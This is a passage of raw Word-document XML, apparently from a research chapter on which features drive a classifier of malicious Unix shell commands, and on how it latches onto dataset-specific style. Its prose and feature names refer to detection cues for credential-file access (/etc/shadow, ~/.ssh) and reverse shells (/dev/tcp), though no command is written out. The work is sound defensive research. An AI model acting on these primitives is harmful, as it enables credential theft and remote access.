                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zsh</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dash</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Execution → Command and Scripting Interpreter: Unix Shell (T1059.004)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>redirect_count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">Count of </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"> output redirects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Execution → Unix Shell (T1059.004)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>pipe_count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.076</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Count of single-`\</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>` pipe stages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Execution → Unix Shell (T1059.004)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>path_proc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.040</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">References to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>/proc/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Discovery → Process/System Discovery (T1057)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lotl_bins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0.030</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Presence of dual-use LotL binaries (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>awk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>vim</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>xxd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>zip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="20" w:after="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Execution / Defense Evasion / Collection → e.g. Archive Collected Data (T1560)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1512"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The gain is steeply front-loaded: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> alone (0.194) carries more weight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>than the next two features combined, and the top three — all Execution/Unix-Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>signals — account for the bulk of the ranked importance before the curve flattens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>into a long tail of near-equal features (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>path_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> at 0.040 down to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lotl_bins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>at 0.030 and below). The model is not spreading its confidence evenly; it is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>betting heavily on a handful of dominant cues.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Surprises versus intuition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The intuitive expectation for a T1059.004 classifier is that it would key on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>semantically malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> content — credential-store paths (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~/.ssh</w:t>
      </w:r>
      <w:r>
        <w:t>), reverse-shell primitives (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r>
        <w:t>), download cradles, or privilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">escalation binaries. Instead, four of the top five features are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>structural</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">rather than semantic: whether </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell binary is present at all, and how many</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">redirects and pipes stitch the one-liner together. These describe the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>shape</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a command — its composition grammar — not its intent. Only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>path_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Discovery)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">and, weakly, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lotl_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gesture at what the command is actually trying to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>and both sit far down the gain curve. The genuinely intent-bearing features from</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the wider feature set (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>path_etc_passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>privesc_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dev_tcp_present</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>evalexec_present</w:t>
      </w:r>
      <w:r>
        <w:t>) either appear only in the mid-pack of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch4_feature_importance_dataset1.png</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or drop out of the top 20 entirely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is exactly the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>style-shortcut risk</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the project set out to probe. Because</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>the labels are provenance-derived (attack samples drawn from one class of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>sources, benign from another), the model can achieve strong training separation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">by learning the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>stylistic fingerprint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the attack corpus — its authors' habit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>of invoking an explicit interpreter and chaining stages with pipes and redirects —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>rather than the underlying malicious behavior. Redirects and pipes are the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>connective tissue of shell tradecraft, but they are equally the connective tissue</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">of ordinary admin and CI scripting; leaning on their </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>counts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a proxy for</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>"looks like a dense one-liner," not "is an attack." A structural feature that</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>correlates with the label in this dataset is a shortcut that may not survive a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>change of provenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="120" w:after="80" w:lineRule="auto" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:t>Cross-dataset divergence foreshadows transfer collapse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>The most consequential observation comes from comparing the two ranking figures.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Dataset 1 the headline feature is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (gain 0.194), with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lotl_bins</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>trailing far behind at 0.030. In Dataset 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ch4_feature_importance_dataset2.png</w:t>
      </w:r>
      <w:r>
        <w:t>) the ordering is nearly inverted:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lotl_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dominates at 0.177 while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>shell_bins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> falls to 0.052. The two corpora</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">do not merely weight a shared signal differently — they disagree about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>family of cues is most discriminative in the first place. Each model has latched</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120" w:lineRule="auto" w:line="360"/>
      </w:pPr>
      <w:r>
        <w:t>onto the provenance-specific style of its own training corpus. Because those</w:t>
